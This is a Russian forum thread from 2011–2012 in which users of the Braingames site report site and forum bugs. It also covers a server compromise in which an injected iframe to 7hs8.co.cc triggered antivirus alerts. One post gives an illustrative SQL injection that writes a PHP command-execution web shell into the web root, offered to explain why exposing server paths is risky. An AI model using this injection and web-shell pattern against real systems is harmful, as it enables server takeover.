IPB

Добро пожаловать, гость ( Вход | Регистрация )

> Правила.

1. Создавайте отдельную тему на каждую ошибку.
2. Попытайтесь максимально точнее описать проблему и указать конкретные действия, которые к ней привели.
3. Не используйте иконки и выделения при создании темы.

> Общие неполадки сайта и форума
VitalyKolobkov
28.10.2011, 20:27
Сообщение #1


Участник
**

Группа: Пользователи Braingames
Сообщений: 244
Регистрация: 18.2.2011
Пользователь №: 23 171
Возможно некоторые из этих багов уже были озвучены, но искать и выяснять по каждому из них слишком долго, так что не обессудьте.
1. Из Гугл Хрома не удается отправлять личные сообщения на сайте. При нажатии кнопки создается ощущение будто бы сообщение отправлено, а оказывается оно просто пропало (проверено вместе с idler_ом)
2. Ни на сайте ни на форуме не сохраняются отправленные личные сообщения в исходящих. Зачем тогда вообще нужна папка Sent Items?
3. При превышении разрешения картинки (400*400) весь ответ на задачу просто исчезает, вместо предупреждения о превышенном размере, так что приходится все набирать заново.
4. При отправке личных сообщений на форуме отсутствует кнопка "прикрепить рисунок".

ПС. Ну, и как я только что обнаружил, невозможно корректировать название созданной темы sad.gif
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
 
 Ответить в эту темуОткрыть новую тему
Ответов
Dmitry
6.2.2012, 0:57
Сообщение #2


Сисадмин
***

Группа: Разработчики
Сообщений: 399
Регистрация: 8.11.2011
Из: Московская область
Пользователь №: 28 784
Даже не представляю каким боком тут вдруг всплыл параметр magic_quotes ... blink.gif
Вообще, можно ли считать мое поведение разумным, если я буду отвечать (да еще и публично) на вопросы о мерах безопасности?
Вот вы, кстати, с какой целью интересуетесь? wink.gif

Кстати, раз уж решили написать, что:
QUOTE(Лиходей @ 5.2.2012, 23:46) *
полные локальные пути сильно помогают при взломе.
Не подскажете, как именно они сильно помогают?


--------------------
Альфа Центавра знаешь? Тамошние мы...
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Лиходей
6.2.2012, 9:29
Сообщение #3


Участник
**

Группа: Пользователи Braingames
Сообщений: 174
Регистрация: 9.12.2008
Пользователь №: 11 533
QUOTE(Dmitry @ 6.2.2012, 1:57) *
Даже не представляю каким боком тут вдруг всплыл параметр magic_quotes ... blink.gif
Отсюда
QUOTE(Black @ 4.2.2012, 23:48) *
будут наблюдаться ошибки при отправке текста с кавычками, пока мы не поправим все модули. просто убирайте кавычки.

QUOTE(Dmitry @ 6.2.2012, 1:57) *
Вообще, можно ли считать мое поведение разумным, если я буду отвечать (да еще и публично) на вопросы о мерах безопасности?
Тот, кто взломал сервак, уже знает о его безопасности всё, что хотел знать =) Какой смысл скрывать что-то дальше?)
QUOTE(Dmitry @ 6.2.2012, 1:57) *
Кстати, раз уж решили написать, что:Не подскажете, как именно они сильно помогают?
Есть запрос вида "select * from users where login=$login". magic_quotes выключены, переметр не фильтруется. В результате запрос преващается в
"select * from users where login='login' and 1=0 union select '<php>shell_exe(GET_["cmd")])</php>' into outfile '/var/www/vhosts/braingames.ru/shell.php'/*". Ну это я на глаз писал. Директива разрешения создания файлов самим mysql по умолчанию включена. В результате в корне сайта появляется шелка произвольной степени навороченности. При отсутствии у злоумышленника локальных путей местораположения файлов веб-сервера задача для него усложняется, так как их необходимо подбирать.


--------------------
F7F7EE
EFEFDF
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения

Сообщения в этой теме
VitalyKolobkov   Общие неполадки сайта и форума   28.10.2011, 20:27
Капитан Очевидность   2. Ни на сайте ни на форуме не сохраняются отправ...   28.10.2011, 20:34
АлександрС   На форуме можно поставить галочку "Добавить ...   28.10.2011, 20:59
VitalyKolobkov   На форуме можно поставить галочку "Добавить ...   28.10.2011, 21:26
idler_   Впервые слышу, что у кого-то такой возможности не...   28.10.2011, 22:19
VitalyKolobkov   Добавил всем пользователям возможность добавления...   28.10.2011, 22:23
Капитан Очевидность   Добавил всем пользователям возможность добавления...   28.10.2011, 22:24
idler_   При нажатии на кнопку "добавить файл" с...   28.10.2011, 22:33
Капитан Очевидность   Могу лишь посоветовать попробовать в другом брауз...   28.10.2011, 22:40
idler_   4. При отправке личных сообщений на форуме отсутст...   28.10.2011, 22:44
Капитан Очевидность   Я проверяю задачи исключительно в хроме. Какие им...   28.10.2011, 22:49
idler_   Одна уже упомянута мною в теме, не работает кнопка...   28.10.2011, 23:09
Капитан Очевидность   Насколько я помню, не работает кнопка "добав...   28.10.2011, 23:17
idler_   Устраивать тестирования и вести их логи никогда не...   28.10.2011, 23:38
Капитан Очевидность   Так интересно лишь описать ошибки или найти альте...   28.10.2011, 23:50
idler_   Вернул настройки пользователей на прежние и провер...   30.10.2011, 10:58
VitalyKolobkov   Что-то у меня сайт сильно перекосило.   5.12.2011, 22:36
UNDEFEAT   Что-то у меня сайт сильно перекосило. Не волнуйт...   5.12.2011, 22:40
VitalyKolobkov   Да, это временно, отображение сайта меняется кажду...   5.12.2011, 22:40
BuPTy03   На каждой странице форума Касперский жалуется на в...   28.1.2012, 17:12
Крантец   На каждой странице форума Касперский жалуется на ...   28.1.2012, 17:19
Black   исправлено   28.1.2012, 21:02
[Dmitry]   исправлено А дырка закрыта, через которую засунул...   29.1.2012, 4:46
Black   дырка не выявлена   30.1.2012, 22:36
[Dmitry]   дырка не выявлена Очень жаль. Возможно она на сос...   31.1.2012, 0:52
Лиходей   7hs8.co.cc заблокировано. Снова эта зараза?(   1.2.2012, 0:42
Black   какая-то падла пролезла на сервак и сломала так, ч...   1.2.2012, 11:08
сапер   какая-то падла пролезла на сервак и сломала так, ...   1.2.2012, 12:40
Black   фрейм убрал, будем выяснять и лечить   1.2.2012, 13:13
Saber   Ответы, содержащие формулы в Tex ($$x^n...   2.2.2012, 8:00
Ischo_Tatiana   Ответы, содержащие формулы в Tex ($$x^n...   2.2.2012, 8:14
Saber   У меня так бывает, когда есть синтаксические оши...   2.2.2012, 9:01
[Dmitry]   Я проверил все, что только возможно проверить. В о...   2.2.2012, 14:49
Saber   Сейчас прошло. Я на задаче 471 дал ответ с достат...   2.2.2012, 15:37
nik_vic   А поделиться? :)   2.2.2012, 18:36
SusAnna   Опять заблокирован :( на этот раз на стадии автори...   2.2.2012, 8:01
UNDEFEAT   Продолжается уже часа два: Когда захожу в Админ-це...   2.2.2012, 16:37
[Dmitry]   Продолжается уже часа два: Когда захожу в Админ-ц...   2.2.2012, 17:02
UNDEFEAT   А если обновить эту "застрявшую" страни...   2.2.2012, 17:06
panda-pandus   Антивирус опять весь день на сайт ругается Опять н...   2.2.2012, 19:00
Black   нажмите Crtl+R если повторится напишите на какой с...   2.2.2012, 19:12
panda-pandus   Дома у меня антивирус молчаливый. Завтра на работе...   2.2.2012, 22:51
VitalyKolobkov   Да, на 7hs8.co.cc уже второй день антивирус ругает...   2.2.2012, 23:00
losse_narmo   Да, на 7hs8.co.cc уже второй день антивирус ругае...   3.2.2012, 9:01
SusAnna   аналогично, уже чистился и смотрел, все равно на ...   3.2.2012, 9:23
[Dmitry]   У вас где-то в кэше застряла эта гадость. Либо обн...   2.2.2012, 23:53
VitalyKolobkov   Какой кэш? Кэш браузера - не помогает, заходил с ...   3.2.2012, 8:55
Black   да почистили вроде   3.2.2012, 9:28
panda-pandus   У меня сегодня не ругается   3.2.2012, 10:44
SusAnna   Не хотелось Вас огорчать :( но эта бяка вернулась ...   3.2.2012, 17:19
[Dmitry]   А на какой странице?   3.2.2012, 18:10
panda-pandus   У меня тоже опять начала выскакивать. И на главной...   3.2.2012, 18:22
[Dmitry]   Ага. Нашли, убрали.   3.2.2012, 18:29
VitalyKolobkov   Спасибо! Сейчас все норм.   3.2.2012, 18:46
Ischo_Tatiana   Дождалась. Сегодня и у меня заругалось   4.2.2012, 15:38
[Dmitry]   Снова убрали.   4.2.2012, 16:20
Kirsten   Не удается посмотреть комментарии для решивших. ...   4.2.2012, 18:41
Black   спасибо :) чем быстрее пишете, тем быстрее будет п...   4.2.2012, 18:45
Saber   спасибо :) чем быстрее пишете, тем быстрее будет...   4.2.2012, 19:55
UNDEFEAT   При попытке ответить пользователю в обсуждении зад...   4.2.2012, 19:52
[Dmitry]   Это ошибка сортировки. Пофиксил.   4.2.2012, 20:34
Saber   думал что-то в стране произошло ... :mellow:   4.2.2012, 20:47
Доцент   При входе в личный кабинет   4.2.2012, 21:53
VitalyKolobkov   При входе в личный кабинет Даже без личного ка...   4.2.2012, 22:00
UNDEFEAT   RE: Общие неполадки сайта и форума   4.2.2012, 22:09
Black   отключили latex. так надо.   4.2.2012, 22:22
Black   должно было пофиксится. если повторяется - пишите...   4.2.2012, 22:48
UNDEFEAT   UNDEFEAT, починилось отображение обсуждения? буд...   4.2.2012, 22:53
UNDEFEAT   [не надо] При попытке перейти в любую задачу: Pa...   4.2.2012, 23:28
Black   продолжайте сообщать об ошибках, глюках и вирусе. ...   4.2.2012, 23:39
[Dmitry]   Перестали работать формулы latex. Сделано специаль...   4.2.2012, 23:49
UNDEFEAT   Не работает:   5.2.2012, 1:55
UNDEFEAT   Одна из ссылок в "Я веду" ведёт в обсужд...   5.2.2012, 0:20
[Dmitry]   А сейчас? Если нет, то где это можно посмотреть?   5.2.2012, 2:20
UNDEFEAT   Сейчас работает.   6.2.2012, 1:22
snav   После добавления или редактирования комментария ци...   5.2.2012, 9:55
Лиходей   Ещё желательно генерацию ошибок отклчать в пхп, та...   5.2.2012, 22:46
[Dmitry]   Не генерацию, а вывод в поток. Отключим, когда все...   5.2.2012, 23:37
Лиходей   Почему? magic_quotes=on?   5.2.2012, 23:56
[Dmitry]   Даже не представляю каким боком тут вдруг всплыл п...   6.2.2012, 0:57
Лиходей   Даже не представляю каким боком тут вдруг всплыл п...   6.2.2012, 9:29
[Dmitry]   Тот, кто взломал сервак, уже знает о его безопасно...   6.2.2012, 13:54
Лиходей   >> Именно. То есть знание путей упрощает жиз...   6.2.2012, 20:48
АлександрС   Пришло несколько ответов, посланных сегодня в сере...   6.2.2012, 21:54
UNDEFEAT   Пришло несколько ответов, посланных сегодня в сер...   6.2.2012, 23:01
[Dmitry]   Пришло несколько ответов, посланных сегодня в сере...   7.2.2012, 0:02
Saber   Два из пропавших ответов - мои, между ними ...   7.2.2012, 7:37
[Dmitry]   Судя по всему, баг устранен. Пустых ответов по это...   7.2.2012, 14:44
Sunday   Как на счет бага с цитированием? Последний пост.   7.2.2012, 14:48
[Dmitry]   Как на счет бага с цитированием? Последний пост.А ...   7.2.2012, 15:22
Sunday   Ничего не изменилось. :(   7.2.2012, 15:32
[Dmitry]   А сейчас?   7.2.2012, 15:52
Sunday   Вот сейчас работает. Спасибо. ПС. Теперь с цитатам...   7.2.2012, 16:18
[Dmitry]   Теперь с цитатами что-то случилось тут :( Не подт...   7.2.2012, 16:25
[Dmitry]   Ахаха. В этом виноват мой ник! Цитаты других п...   7.2.2012, 16:36
[Dmitry]   Подумаю, исправить это или сменить ник.Склонился к...   8.2.2012, 0:51
idler_   Склонился к первому варианту и сделал костылик в ...   8.2.2012, 9:50
VitalyKolobkov   Опять одолевает баг, когда при наборе ответа испол...   9.2.2012, 3:10
Sunday   RE: Общие неполадки сайта и форума   7.2.2012, 16:27
[Dmitry]   В предпросмотре или уже после отправки ответа?   9.2.2012, 3:36
2 Страниц V  1 2 >

« Предыдущая тема · Ошибки на сайте и предложения по улучшению · Следующая тема »
 

Ответить в эту темуОткрыть новую тему
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0 -

 

Стиль отображения: Переключить: Стандартный · Переключить: Линейный · Каскадный

Подписаться на тему · Послать тему по E-mail · Распечатать тему · Подписаться на этот раздел

- Упрощённая версия Сейчас: 27.8.2025, 14:40
Яндекс.Метрика
Invision Power Board v2.1.4 © 2025  IPS, Inc.